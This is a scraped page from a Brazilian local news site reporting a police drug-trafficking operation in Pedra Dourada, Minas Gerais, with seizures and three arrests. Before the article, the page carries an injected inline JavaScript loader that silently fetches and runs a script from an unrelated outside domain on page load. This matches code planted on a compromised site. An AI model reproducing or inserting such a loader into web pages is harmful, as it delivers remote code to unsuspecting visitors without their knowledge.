;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Operação “Antídoto” apreende cocaína e maconha e prende suspeitos de tráfico em Pedra Dourada. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Operação “Antídoto” apreende cocaína e maconha e prende suspeitos de tráfico em Pedra Dourada.

A Polícia Civil, por meio do 4º Departamento de Juiz de Fora e da 38ª Delegacia da Comarca de Tombos, em ação conjunta com o 4º Pelotão da Polícia Militar de Tombos, deflagrou, nesta manhã (10), em Pedra Dourada, a operação “Antídoto”, no combate ao tráfico de drogas. Três homens, 21, 33 e 53 anos, foram presos em flagrante por tráfico. Também foram apreendidos mais de 99 gramas de cocaína, dividida em quatro papelotes, já destinados à venda, 2,606 Kg de maconha, uma motocicleta, uma motosserra, aparelhos celulares e pen drive.
Conforme o delegado Diêgo Candian Alves, foram cumpridos sete mandados de busca e apreensão – expedidos pela juíza Alinne Arquette, com o parecer favorável do promotor de Justiça Cláudio Cerqueira. “ Em locais suspeitos de mercancia de drogas ilícitas e de armas de fogo”, informou, enfatizando que essa é considerada a maior apreensão de maconha da história de Pedra Dourada e da Comarca de Tombos.
Ainda segundo o delegado, a ação foi possível, mais uma vez, com a ajuda da população. “Os autores já estavam sendo investigados por tráfico de entorpecentes e, graças às denúncias anônimas, conseguimos apreender essa grande quantidade de drogas. Agradeço à população douradense que sempre se encontra trabalhando com a Polícia, ainda que de forma anônima”, destacou.

Informação: Glaciane Vitorino
Assessoria de Comunicação PCMG
Núcleo Avançado do 4º Departamento de Polícia em Juiz de Fora
Telefone:(32) 3692-5657/ (32)3692-5671/ (31) 9387-0118

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.